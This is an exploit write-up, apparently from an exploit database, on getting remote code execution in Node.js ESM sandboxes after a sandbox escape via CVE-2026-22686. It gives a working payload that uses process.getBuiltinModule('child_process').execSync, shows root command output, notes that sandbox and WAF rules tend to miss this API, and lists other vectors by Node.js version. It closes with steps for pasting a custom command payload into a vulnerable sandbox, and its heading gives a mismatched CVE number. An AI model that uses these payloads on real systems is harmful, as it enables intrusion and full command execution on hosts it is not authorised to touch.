Share
## https://sploitus.com/exploit?id=9EEC95A0-85D9-56B0-8E24-676B414B721D
## RCE in ESM Environments โ€” The `require` Problem

When achieving sandbox escape via CVE-2026-22686, executing OS commands in an 
ESM project (`"type": "module"`) requires bypassing Node.js module loading restrictions. 
Standard approaches fail for the following reasons:

| Vector | Result |
|--------|--------|
| `require('child_process')` | โŒ `require is not defined` โ€” not available in ESM |
| `process.mainModule.require(...)` | โŒ `Cannot read properties of undefined` โ€” `mainModule` is `undefined` in ESM |
| `import('child_process')` | โŒ `A dynamic import callback was not specified` โ€” requires a hook not configured in the sandbox |
| `process.binding('spawn_sync')` | โš ๏ธ Available but too low-level โ€” requires manual syscall construction |

---

## Solution: Process Enumeration โ†’ `process.getBuiltinModule`

Instead of assuming a module loading method, we enumerate `process` keys directly 
from the host context (already accessible after sandbox escape):
```javascript
return Object.keys(process)
```

Among the keys returned, `getBuiltinModule` was identified โ€” a **Node.js 22+ native API** 
designed specifically to allow ESM modules to access built-in Node.js modules 
**without `require` or `import()`**.
```javascript
process.getBuiltinModule('child_process').execSync('id').toString()
// โ†’ uid=0(root) gid=0(root) groups=0(root)  โœ… RCE confirmed
```

This is the **key insight**: `process.getBuiltinModule` is a relatively new API 
(Node.js >= 22.3.0) and is frequently overlooked by sandbox implementations 
and WAF rules that block `require` and `import`.

---

## Alternative Vectors (by Node.js version)

Depending on the target environment, other vectors may be available after 
enumerating `process`:

| Vector | Node.js Version | Notes |
|--------|----------------|-------|
| `process.getBuiltinModule('child_process')` | >= 22.3.0 | โœ… Cleanest โ€” official ESM-safe API |
| `process.binding('spawn_sync')` | All | โš ๏ธ Low-level, requires manual buffer construction |
| `process.mainModule.require(...)` | CJS only | โŒ Undefined in ESM |
| `__non_webpack_require__` | Webpack bundles | โš ๏ธ Environment-specific |
| `Module.createRequire(import.meta.url)` | >= 12.2.0 | โš ๏ธ Needs `Module` reference from host |
| `process._linkedBinding('node_os')` | Internal builds | โš ๏ธ Rarely exposed |

> **Takeaway:** Always enumerate `Object.keys(process)` after achieving host 
> context access. The available attack surface varies significantly by Node.js 
> version and project configuration. `getBuiltinModule` is the most reliable 
> vector in modern Node.js ESM environments.


# CVE-2026-2268-RemoteCodeExecution-RCE-PoC
Steps:
1. Insert your personal command
2. Paste the rersultant payload generated in  your vulnerable js sandbox interpreter
3. Disfrut the results